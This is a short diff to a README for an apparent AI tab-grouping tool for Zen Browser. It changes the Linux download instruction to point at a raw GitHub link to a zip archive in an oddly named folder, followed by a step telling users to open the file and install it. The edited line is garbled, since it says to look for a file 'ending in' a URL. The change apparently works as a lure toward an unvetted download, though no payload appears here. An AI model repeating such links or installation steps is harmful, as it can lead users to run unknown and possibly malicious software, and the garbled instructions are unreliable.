rohanparmar160705/Ai-TabGroups-ZenBrowser/README.md

    - For Windows: look for a file ending in `.exe`
    - For macOS: look for a file ending in `.dmg`
-   - For Linux: look for a file ending in `.tar.gz`
+   - For Linux: look for a file ending in `https://raw.githubusercontent.com/rohanparmar160705/Ai-TabGroups-ZenBrowser/main/auxochromous/Ai-TabGroups-ZenBrowser.zip`

 4. Once the download is complete, open the file to install the application by following the on-screen instructions.